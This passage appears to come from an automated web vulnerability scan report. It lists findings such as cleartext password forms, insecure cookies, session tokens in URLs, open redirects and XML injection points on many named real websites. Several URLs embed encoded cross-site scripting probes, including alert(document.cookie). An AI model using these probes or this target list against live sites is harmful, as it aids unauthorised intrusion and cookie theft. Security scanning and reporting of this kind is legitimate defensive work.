5.75. http://www.nowpublic.com/crossdomain.xml

5.76. http://www.orkut.com/crossdomain.xml

5.77. http://www.vodafone.de/crossdomain.xml

5.78. http://faves.com/crossdomain.xml

5.79. http://www.livejournal.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.de.doubleclick.net/clientaccesspolicy.xml

6.3. http://ad.doubleclick.net/clientaccesspolicy.xml

6.4. http://b.voicefive.com/clientaccesspolicy.xml

6.5. http://clk.redcated/clientaccesspolicy.xml

6.6. http://enterprisemediagroup.112.2o7.net/clientaccesspolicy.xml

6.7. http://metrics.blackberry.com/clientaccesspolicy.xml

6.8. http://msdn.microsoft.com/clientaccesspolicy.xml

6.9. http://spe.redcated/clientaccesspolicy.xml

6.10. http://www91.intel.com/clientaccesspolicy.xml

6.11. http://ziffdavisbaseline.112.2o7.net/clientaccesspolicy.xml

6.12. http://d.ligatus.com/clientaccesspolicy.xml

6.13. http://officedepot.shoplocal.com/clientaccesspolicy.xml

6.14. http://www.microsoft.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://channelmarketing.owneriq.com/rmb-account/login-page

7.2. http://dailyme.com/

7.3. http://digg.com/submit

7.4. http://fussballmania.com/

7.5. http://hhonors1.hilton.com/en_US/hh/home_index.do

7.6. http://hhonors1.hilton.com/en_US/hh/home_index.do

7.7. http://malsup.com/jquery/form/

7.8. http://malsup.com/jquery/form/

7.9. http://malsup.com/jquery/form/

7.10. http://malsup.com/jquery/form/

7.11. http://malsup.com/jquery/form/

7.12. http://malsup.com/jquery/form/

7.13. http://multiply.com/

7.14. http://multiply.com/

7.15. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

7.16. http://tipd.com/

7.17. http://tipd.com/

7.18. http://tipd.com/register

7.19. http://tipd.com/register

7.20. http://unalog.com/

7.21. http://vodpod.com/

7.22. http://www.arto.com/

7.23. http://www.bibsonomy.org/

7.24. http://www.coe.gatech.edu/

7.25. http://www.connotea.org/

7.26. http://www.efort.org/

7.27. http://www.facebook.com/

7.28. http://www.jamespot.com/

7.29. http://www.jazdtech.com/techdirect/

7.30. http://www.jumptags.com/

7.31. http://www.kledy.co.uk/

7.32. http://www.kledy.de/

7.33. http://www.kledy.de/bookmarks.php

7.34. http://www.kledy.de/bookmarks.php/

7.35. http://www.kledy.de/buttons.php

7.36. http://www.kledy.de/groups.php

7.37. http://www.kledy.de/impressum.php

7.38. http://www.kledy.de/login.php

7.39. http://www.kledy.de/login.php

7.40. http://www.kledy.de/topusers.php

7.41. http://www.kledy.es/

7.42. http://www.kledy.eu/

7.43. http://www.kledy.it/

7.44. http://www.kledy.us/

7.45. http://www.klivio.com/

7.46. http://www.klivio.de/

7.47. http://www.linkagogo.com/

7.48. http://www.linkatopia.com/

7.49. http://www.migrationexpertzone.com/

7.50. http://www.myfitnesspal.com/nutrition-facts-calories/bjs

7.51. http://www.mylinkvault.com/

7.52. http://www.nmworkwear.de/

7.53. http://www.nmworkwear.de/index.php

7.54. http://www.nowpublic.com/

7.55. http://www.ortho.hyperguides.com/

7.56. http://www.ota.org/members_only/login_menu.cfm

7.57. http://www.pdfforge.org/

7.58. http://www.peppernews.eu/

7.59. http://www.reddit.com/

7.60. http://www.reddit.com/

7.61. http://www.reddit.com/

7.62. http://www.shoppinga.de/

7.63. http://www.sitejot.com/

7.64. http://www.spiele365.com/

7.65. http://www.squidoo.com/

7.66. http://www.squidoo.com/

7.67. http://www.stumbleupon.com/

7.68. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

7.69. http://www.technotizie.it/

7.70. http://www.technotizie.it/

7.71. http://www.tumblr.com/

7.72. http://www.tumblr.com/

7.73. http://www.yigg.de/

7.74. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

7.75. http://www1.hilton.com/en_US/hi/index.do

7.76. http://www1.hilton.com/en_US/hi/index.do

8. XML injection

8.1. http://amch.questionmarket.com/adsc/d852910/8/40051907/decide.php [REST URL parameter 1]

8.2. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

8.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

8.4. http://amch.questionmarket.com/kcontent/478/ktag.js [REST URL parameter 1]

8.5. http://amch.questionmarket.com/kcontent/478/ktag.js [REST URL parameter 2]

8.6. http://amch.questionmarket.com/kcontent/478/ktag.js [REST URL parameter 3]

8.7. http://api.tweetmeme.com/button.js [REST URL parameter 1]

8.8. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 1]

8.9. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 2]

8.10. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 3]

8.11. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 4]

8.12. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 5]

8.13. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 1]

8.14. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 2]

8.15. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 3]

8.16. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 4]

8.17. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 5]

8.18. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 1]

8.19. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 2]

8.20. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 3]

8.21. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 4]

8.22. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 1]

8.23. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 2]

8.24. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 3]

8.25. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 4]

8.26. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 5]

8.27. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 6]

8.28. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 1]

8.29. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 2]

8.30. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 3]

8.31. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 4]

8.32. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 5]

8.33. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 6]

8.34. http://coverall.splunk.com/web_assets/v5/homepage [REST URL parameter 1]

8.35. http://coverall.splunk.com/web_assets/v5/homepage [REST URL parameter 2]

8.36. http://coverall.splunk.com/web_assets/v5/homepage [REST URL parameter 3]

8.37. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 1]

8.38. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 2]

8.39. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 3]

8.40. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 4]

8.41. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 1]

8.42. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 2]

8.43. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 3]

8.44. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 4]

8.45. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 1]

8.46. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 2]

8.47. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 3]

8.48. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 4]

8.49. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 1]

8.50. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 2]

8.51. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 3]

8.52. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 4]

8.53. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/favicon16.ico [REST URL parameter 1]

8.54. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/favicon16.ico [REST URL parameter 2]

8.55. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/favicon16.ico [REST URL parameter 3]

8.56. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 1]

8.57. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 2]

8.58. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 3]

8.59. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 4]

8.60. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 5]

8.61. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 1]

8.62. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 2]

8.63. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 3]

8.64. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 4]

8.65. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 5]

8.66. http://edge.quantserve.com/quant.js [REST URL parameter 1]

8.67. http://load.exelator.com/load/ [REST URL parameter 1]

8.68. http://platform.twitter.com/widgets.js [REST URL parameter 1]

8.69. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.70. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.71. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.72. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.73. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 2]

8.74. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 3]

8.75. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 2]

8.76. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 3]

8.77. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 1]

8.78. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 2]

8.79. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 3]

8.80. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 4]

8.81. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 5]

8.82. http://splunkbase.splunk.com/apps/All/4.x/ [sort parameter]

8.83. http://tools.ietf.org/html/rfc2234] [REST URL parameter 1]

8.84. http://tools.ietf.org/html/rfc3492 [REST URL parameter 1]

8.85. http://tools.ietf.org/html/rfc3986 [REST URL parameter 1]

8.86. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 1]

8.87. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 2]

8.88. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 1]

8.89. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 2]

8.90. http://www.nmworkwear.de/index.php [REST URL parameter 1]

8.91. http://www.peppernews.eu/favicon.ico [REST URL parameter 1]

8.92. http://www.traffictrack.de/tracking/mpr.php [REST URL parameter 1]

8.93. http://www.traffictrack.de/tracking/mpr.php [REST URL parameter 2]

9. SSL cookie without secure flag set

9.1. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

9.2. https://ebus.ota.org/default.aspx

9.3. https://online.americanexpress.com/myca/logon/us/action

9.4. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

9.5. https://splunk.webex.com/mw0305l/mywebex/default.do

9.6. https://www.blackberry.com/profile/

9.7. https://www.box.net/

9.8. https://www.slackinc.com/reprints/order.asp

9.9. https://www.slackinc.com/subscribe/newsubs/atshcstep1.asp

9.10. https://www.slackinc.com/subscribe/newsubs/otistep1.asp

9.11. https://www201.americanexpress.com/MobileWeb/index.jsp

9.12. https://www209.americanexpress.com/merchant/marketing-data/pages/home

9.13. https://www209.americanexpress.com/merchant/marketing-data/pages/marketingprograms

9.14. https://www209.americanexpress.com/merchant/marketing-data/pages/reportsandtrends

9.15. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

9.16. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do

9.17. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

9.18. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do

9.19. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do

9.20. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

9.21. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do

9.22. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do

9.23. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do

9.24. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalsavings.do

9.25. https://www212.americanexpress.com/dsmlive/dsm/int/fxip/fxinternationalpayments.do

9.26. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

9.27. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

9.28. https://www257.americanexpress.com/openhome/smallbusiness.do

9.29. https://www295.americanexpress.com/entertainmentaccess/home.do

9.30. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

9.31. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do

9.32. https://axptravel.americanexpress.com/consumertravel/travel.do

9.33. https://home.americanexpress.com/home/corporations.shtml

9.34. https://home.americanexpress.com/home/global_splash.html

9.35. https://home.americanexpress.com/home/mt_personal.shtml

9.36. https://lct.salesforce.com/

9.37. https://online.americanexpress.com/myca/acctsumm/us/action

9.38. https://sb.voicefive.com/b

9.39. https://www.americanexpress.com/airlines-credit-card/

9.40. https://www.americanexpress.com/credit-card-rewards/

9.41. https://www.americanexpress.com/gift/giftcardslanding.shtml

9.42. https://www.americanexpress.com/gold-card/

9.43. https://www.americanexpress.com/no-annual-fee-credit-cards/

9.44. https://www.blackberry.com/partnerzone/Forward.action

9.45. https://www.blackberry.com/partnerzone/Login.action

9.46. https://www.openforum.com/

9.47. https://www.xing.com/

9.48. https://www134.americanexpress.com/consumertravel/travel.do

9.49. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

9.50. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do

9.51. https://www217.americanexpress.com/cards/home.do

9.52. https://www217.americanexpress.com/cards/shopping/index.jsp

10. Session token in URL

10.1. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css

10.2. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css

10.3. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js

10.4. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js

10.5. http://feedburner.google.com/fb/a/mailverify

10.6. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

10.7. http://hhonors1.hilton.com/en_US/hh/home_index.do

10.8. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

10.9. http://homeappliance.manualsonline.com/regman/login/loginForm

10.10. http://homeappliance.manualsonline.com/regman/user/getUserBlock

10.11. http://homeappliance.manualsonline.com/regman/user/validateUser

10.12. http://session.owneriq.net/regman/mem/initsession

10.13. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

10.14. http://tools.cisco.com/search/display

10.15. https://www.aeprepaid.com/index.cfm

10.16. http://www.amazon.com/

10.17. http://www.csc.gatech.edu/~copeland/6612/tool-links.html

10.18. http://www.linkedin.com/companies/222438/OwnerIQ

10.19. http://www.mittelstandsblog.de/

10.20. http://www.officedepot.com/

10.21. http://www.officedepot.com/promo/list5.do

10.22. http://www.oneview.de/

10.23. http://www.quantcast.com/p-bdv9UMaVrliL2

10.24. http://www.splunk.com/page/company_news

10.25. http://www.usbjd.org/

10.26. http://www.yasni.de/

10.27. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

10.28. http://www1.hilton.com/en_US/hi/index.do

10.29. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

11. Password field submitted using GET method

11.1. http://channelmarketing.owneriq.com/rmb-account/login-page

11.2. http://digg.com/submit

11.3. http://www.jazdtech.com/techdirect/

11.4. http://www.squidoo.com/

11.5. http://www.technotizie.it/

12. ASP.NET ViewState without MAC enabled

12.1. https://ebus.ota.org/default.aspx

12.2. http://www.twiddla.com/

13. Open redirection

13.1. http://ad.zanox.com/tpv/ [14786739C435671106&ULP parameter]

13.2. http://mm.chitika.net/track [target parameter]

13.3. http://www.linuxsecurity.com/ads/adclick.php [Referer HTTP header]

13.4. http://www.splunk.com/index.php/sso_checker [Referer HTTP header]

14. Cookie scoped to parent domain

14.1. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

14.2. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

14.3. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

14.4. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

14.5. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/

14.6. http://homeappliance.manualsonline.com/managemystuff.html

14.7. http://homeappliance.manualsonline.com/proxy.class.php

14.8. http://homeappliance.manualsonline.com/regman/login/loginForm

14.9. http://homeappliance.manualsonline.com/regman/user/getUserBlock

14.10. http://homeappliance.manualsonline.com/regman/user/validateUser

14.11. http://session.owneriq.net/regman/mem/initsession

14.12. http://software.intel.com/en-us/articles/intel-cloud-builders/

14.13. http://software.intel.com/sites/oss/

14.14. http://t.mookie1.com/t/v1/clk

14.15. http://www.amazon.com/

14.16. http://www.bebo.com/

14.17. https://www.box.net/

14.18. http://www.coe.gatech.edu/

14.19. http://www.diigo.com/

14.20. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

14.21. http://www.gpg.org/

14.22. http://www.hyves.nl/

14.23. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

14.24. http://www.manualsonline.com/privacy.html

14.25. http://www.manualsonline.com/tc.html

14.26. http://www.mylinkvault.com/

14.27. http://www.myspace.com/

14.28. http://www.oit.gatech.edu/content/information-security/

14.29. http://www.oit.gatech.edu/service/software-distribution/software-distribution

14.30. http://www.opensource.org/licenses

14.31. http://www.opensource.org/licenses/gpl-license.php

14.32. http://www.opensource.org/licenses/mit-license.php

14.33. http://www.pdfforge.org/

14.34. http://www.pusha.se/

14.35. http://www.stumbleupon.com/

14.36. http://www.sulit.com.ph/index.php/view

14.37. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

14.38. http://www.webnews.de/

14.39. http://a.rfihub.com/ca.gif

14.40. http://a.tribalfusion.com/i.cid

14.41. http://a.tribalfusion.com/j.ad

14.42. http://action.media6degrees.com/orbserv/hbpix

14.43. http://ad.doubleclick.net/click

14.44. http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html

14.45. http://ad.doubleclick.net/clk

14.46. http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.11

14.47. http://ad.zanox.com/tpv/

14.48. http://adclick.g.doubleclick.net/aclk

14.49. http://ak1.abmr.net/is/us.blackberry.com

14.50. http://altfarm.mediaplex.com/ad/ck/14302-119028-23636-2

14.51. http://altfarm.mediaplex.com/ad/ck/9700-118565-26469-2

14.52. http://altfarm.mediaplex.com/ad/js/14302-119028-23636-2

14.53. http://altfarm.mediaplex.com/ad/nc/14302-119028-23636-2

14.54. http://amch.questionmarket.com/adsc/d852910/8/40051907/decide.php

14.55. http://ar.voicefive.com/b/wc_beacon.pli

14.56. http://ar.voicefive.com/bmx3/broker.pli

14.57. https://axptravel.americanexpress.com/consumertravel/travel.do

14.58. http://b.scorecardresearch.com/b

14.59. http://b.scorecardresearch.com/p

14.60. http://b.voicefive.com/b

14.61. http://baselinemag.us.intellitxt.com/al.asp

14.62. http://baselinemag.us.intellitxt.com/intellitxt/front.asp

14.63. http://blogs.splunk.com/

14.64. http://bookmarks.yahoo.com/

14.65. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

14.66. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

14.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.68. http://buzz.yahoo.com/

14.69. http://buzzport.gatech.edu/

14.70. http://c03.adsummos.net/a/e/d1.ads

14.71. http://c03.adsummos.net/a/e/s21719

14.72. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

14.73. http://clk.redcated/229/go/253329229/direct

14.74. http://clk.redcated/MRT/go/258547606/direct/01/

14.75. http://clk.redcated/MRT/go/264255445/direct

14.76. http://clk.redcated/MRT/go/267859374/direct

14.77. http://clk.redcated/go/264255445/direct

14.78. http://clk.redcated/go/267859374/direct

14.79. http://corp.americanexpress.com/gcs/cards/

14.80. http://corp.americanexpress.com/gcs/cards/land/compare.aspx

14.81. http://corp.americanexpress.com/gcs/travel/us/

14.82. http://counter.yadro.ru/hit

14.83. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xNzk2NjkwL3QvMg/cat/267859374-193167493/qry/

14.84. http://del.icio.us/post

14.85. http://developer.yahoo.com/yui/

14.86. http://developer.yahoo.com/yui/license.html

14.87. http://developers.facebook.com/plugins/

14.88. http://download32.us.intellitxt.com/al.asp

14.89. http://download32.us.intellitxt.com/intellitxt/front.asp

14.90. http://eas.statcamp.net/eas

14.91. http://edge.quantserve.com/quant.js

14.92. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

14.93. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s29905151680577

14.94. http://feedburner.google.com/fb/a/mailverify

14.95. http://fusion.google.com/add

14.96. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

14.97. http://hhonors1.hilton.com/en_US/hh/home_index.do

14.98. https://home.americanexpress.com/home/corporations.shtml

14.99. https://home.americanexpress.com/home/global_splash.html

14.100. https://home.americanexpress.com/home/mt_personal.shtml

14.101. http://i.w55c.net/rs

14.102. http://ib.adnxs.com/px

14.103. http://ib.adnxs.com/seg

14.104. http://ib.adnxs.com/setuid

14.105. http://idcs.interclick.com/Segment.aspx

14.106. http://idpix.media6degrees.com/orbserv/hbpix

14.107. http://imp.constantcontact.com/imp/cmp.jsp

14.108. http://leadback.advertising.com/adcedge/lb

14.109. http://load.exelator.com/load/

14.110. http://map.media6degrees.com/orbserv/hbpix

14.111. http://messenger.yahoo.com/

14.112. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461

14.113. http://mittelstandsblog.de.intellitxt.com/intellitxt/front.asp

14.114. http://mm.chitika.net/minimall

14.115. http://mm.chitika.net/track

14.116. http://msdn.microsoft.com/en-us/library/ms537509(VS.85

14.117. http://myweb2.search.yahoo.com/myresults/bookmarklet

14.118. https://online.americanexpress.com/myca/acctsumm/us/action

14.119. https://online.americanexpress.com/myca/logon/us/action

14.120. http://orthoinfo.aaos.org/

14.121. http://pixel.33across.com/ps/

14.122. http://pixel.intellitxt.com/pixel.jsp

14.123. http://pixel.quantserve.com/pixel

14.124. http://px.owneriq.net/cm

14.125. http://px.owneriq.net/oxcm

14.126. http://px.owneriq.net/p

14.127. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

14.128. http://rt32.infolinks.com/action/doq.htm

14.129. http://rt82.infolinks.com/action/doq.htm

14.130. http://rt83.infolinks.com/action/doq.htm

14.131. https://sb.voicefive.com/b

14.132. http://segment-pixel.invitemedia.com/pixel

14.133. http://splunkbase.splunk.com/

14.134. http://tags.bluekai.com/site/2956

14.135. http://tools.cisco.com/search/display

14.136. http://track2.mybloglog.com/js/jsserv.php

14.137. http://us.blackberry.com/assets_refresh/images/dropNavArrow.png

14.138. http://vegetarian.about.com/od/soupsstewsandchili/r/hotandsour.htm

14.139. http://www.active-srv02.de/werbemittel/WebObjects/werbemittel.woa/wa/ads

14.140. https://www.americanexpress.com/airlines-credit-card/

14.141. https://www.americanexpress.com/credit-card-rewards/

14.142. https://www.americanexpress.com/gift/giftcardslanding.shtml

14.143. https://www.americanexpress.com/gold-card/

14.144. https://www.americanexpress.com/no-annual-fee-credit-cards/

14.145. http://www.au2m8.com/v/

14.146. http://www.au2m8.com/v/

14.147. http://www.au2m8.com/v/

14.148. http://www.au2m8.com/v/

14.149. http://www.au2m8.com/v/

14.150. http://www.au2m8.com/v/

14.151. http://www.au2m8.com/v/

14.152. http://www.au2m8.com/v/

14.153. http://www.au2m8.com/v/

14.154. http://www.au2m8.com/v/

14.155. http://www.au2m8.com/v/

14.156. http://www.au2m8.com/v/

14.157. http://www.au2m8.com/v/

14.158. http://www.au2m8.com/v/

14.159. http://www.au2m8.com/v/

14.160. http://www.au2m8.com/v/

14.161. http://www.au2m8.com/v/

14.162. http://www.au2m8.com/v/

14.163. http://www.au2m8.com/v/

14.164. http://www.au2m8.com/v/

14.165. http://www.au2m8.com/v/

14.166. http://www.au2m8.com/v/

14.167. http://www.au2m8.com/v/

14.168. http://www.au2m8.com/v/

14.169. http://www.au2m8.com/v/

14.170. http://www.au2m8.com/v/

14.171. http://www.au2m8.com/v/

14.172. http://www.au2m8.com/v/

14.173. http://www.au2m8.com/v/

14.174. http://www.au2m8.com/v/

14.175. http://www.au2m8.com/v/

14.176. http://www.au2m8.com/v/

14.177. http://www.au2m8.com/v/

14.178. http://www.au2m8.com/v/

14.179. http://www.au2m8.com/v/

14.180. http://www.au2m8.com/v/

14.181. http://www.au2m8.com/v/

14.182. http://www.au2m8.com/v/

14.183. http://www.au2m8.com/v/

14.184. http://www.au2m8.com/v/

14.185. http://www.au2m8.com/v/

14.186. http://www.au2m8.com/v/

14.187. http://www.au2m8.com/v/

14.188. http://www.au2m8.com/v/

14.189. http://www.au2m8.com/v/

